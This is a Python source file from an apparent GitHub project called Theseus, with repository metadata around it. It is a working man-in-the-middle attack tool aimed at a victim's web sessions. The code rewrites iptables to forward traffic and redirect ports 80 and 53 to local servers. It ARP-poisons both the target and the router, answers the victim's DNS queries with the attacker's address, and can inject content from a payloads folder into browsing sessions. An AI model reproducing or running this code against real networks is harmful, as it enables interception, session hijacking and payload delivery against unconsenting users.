"bytes": "38502"
},
{
"name": "Python",
"bytes": "26601"
}
],
"symlink_target": ""
}
|
import os
import re
import sys
import socket
import argparse
import threading
import multiprocessing
from arp.arp import Arp_Spoof
from logger.logger import Logger
from arp.ping import Arp_Ping
from banner.banner import New_Banner
from server.server import HTTP_Server
from dns.dns import Decode_Packet, DNS_Server
class Theseus(object):
"""Theseus Control A Victims Web Sessions"""
def __init__(self):
global args, arp, http_Server, ssl_Server, local, router, verbose, html_file, cfg, bhttp, bssl, payloads_folder, log, tm
super(Theseus, self).__init__()
log = Logger()
ap = argparse.ArgumentParser(description="Theseus", add_help=True)
ap.add_argument("--target", help="This is the targets ip address", required=True)
ap.add_argument("--iface", help="This is the network cards current interface", required=True)
ap.add_argument("--gateway", help="This is the routers ip address", required=True)
ap.add_argument("--verbose", help="This is the time interval between the arp packets", required=False)
ap.add_argument("--target-mac", help="This is the targets mac address", required=False)
ap.add_argument('--arp-ping', action='store_const', const=sum, help='This will get the targets mac address via a discret arp ping')
ap.add_argument('--force-content', action='store_const', const=sum, help='This option will force a custom website into each session')
ap.add_argument("--spoof", help="Type of spoof (arp)", required=True)
args = ap.parse_args()
log.status("Configuring iptables")
        # Configure the kernel and iptables for the attack; change the echo value to 0 if it doesn't work
os.popen("{ echo 1 > /proc/sys/net/ipv4/ip_forward;\
iptables --flush;\
iptables --flush -t nat;\
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 9000;\
iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port 5000; }") #Changed IP Forwarding
# Load Setting From Config file
local = os.popen('ifconfig | grep -Eo \'inet (addr:)?([0-9]*\.){3}[0-9]*\' | grep -Eo \'([0-9]*\.){3}[0-9]*\' | grep -v \'127.0.0.1\'').read().strip('\n')
payloads_folder = 'server/Payloads'
verbose = 5
        # Handle any possible errors from the parsed arguments
try:
int(verbose)
except ValueError:
print("\033[1;31mTime must be whole number\033[00m")
exit()
try:
socket.inet_aton(args.target)
socket.inet_aton(args.gateway)
except socket.error:
print("\033[1;31mIncorrect IP address\033[00m")
exit()
if args.target_mac:
if re.match("[0-9a-f]{2}([-:])[0-9a-f]{2}(\\1[0-9a-f]{2}){4}$", args.target_mac) != None:
tm = args.target_mac
pass
else:
print("\033[1;31mInvalid mac address\033[00m")
tm = None
exit()
else:
pass
def dns_spoof(self, dns, *args):
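        # Worker loop: wait for each intercepted DNS query and answer it with
        # the redirect address (args[0]), so lookups resolve to this host.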
redirect_ip = args[0]
while True:
raw, addr = dns.await_responce()
dns.send_reply(addr, raw, redirect_ip)
def attack_dns_spoof(self):
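        # Spawn four worker processes that answer DNS queries with the local
        # (attacker) address; UDP port 53 was redirected to 5000 by the iptables rules above.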
dns = DNS_Server(local)
jobs = []
for i in range(4):
p = multiprocessing.Process(target=self.dns_spoof, args=(dns, local))
jobs.append(p)
p.start()
def arp_spoof(self, tm):
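        # Poison both directions of the ARP cache (victim -> gateway and
        # gateway -> victim) in separate processes so traffic flows through this host.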
arp = Arp_Spoof(args.iface)
try:
log.status("{} ({}) is at {}".format(socket.gethostbyaddr(args.target)[0], args.target, tm))
except socket.herror:
log.warn("{} is at {}".format(args.target, tm))
ajobs = []
victim_thread = multiprocessing.Process(target=arp.poison_victim, args=(args.target, args.gateway, int(verbose), args.iface, tm))
ajobs.append(victim_thread)
victim_thread.start()
try:
vname = socket.gethostbyaddr(args.target)[0]
vname = vname.replace('.home', " ")
log.status("Started attack on {}".format(vname))
except socket.herror:
log.warn("Started attack on {}".format(args.target))
target_thread = multiprocessing.Process(target=arp.poison_router, args=(args.gateway, args.target, int(verbose), args.iface, tm))
        ajobs.append(target_thread)
target_thread.start()
try:
rname = socket.gethostbyaddr(args.gateway)[0]
rname = rname.replace('.home', " ")
log.status("Started attack on {}".format(rname))
except socket.herror:
log.warn("Started attack on {}".format(args.target))
def arp_ping(self):
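        # Resolve the target's MAC address by sending a single ARP request and
        # waiting for the first matching reply.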
p = Arp_Ping(args.iface)
p.ping(args.target, local, args.iface)
while True:
tm = p.await_responce(args.iface)
try:
if len(tm) != 0:
break
except TypeError: pass
return tm[0]
def force_content(self):
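        # Start the HTTP workers that serve the forced content on port 9000
        # (TCP port 80 is redirected there by the iptables rules above).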
http_Server = HTTP_Server(local, payloads_folder)
log.status("Started HTTP server on port 9000\n")
jobs = []
for i in range(4):
            p = multiprocessing.Process(target=http_Server._http_client_handler, args=(payloads_folder,))
jobs.append(p)
p.start()
if __name__ == '__main__':
b = New_Banner()
print("\033[1;3m"+b.new()+"\033[00m")
t = Theseus()
t.attack_dns_spoof()
log.status("Started DNS server")
if args.arp_ping:
log.status("Sending arp ping to {}".format(args.target))
tm = t.arp_ping()
if 'arp' in args.spoof:
t.arp_spoof(tm)
if args.force_content:
t.force_content()
|
{
"content_hash": "b5cadec869376ee9ab8681e400334a5a",
"timestamp": "",
"source": "github",
"line_count": 151,
"max_line_length": 156,
"avg_line_length": 33.4635761589404,
"alnum_prop": 0.6698990698594894,
"repo_name": "Dylan-halls/Theseus",
"id": "675e627f3d9c0a1e48cdbfa7f8686e7e3ba2a9d7",
"size": "5053",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/Theseus.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "207"
},
{
"name": "HTML",
"bytes": "488"
},
{
"name": "JavaScript",
"bytes": "2823"
},
{
"name": "Python",
"bytes": "187593"
}
],
"symlink_target": ""
}
|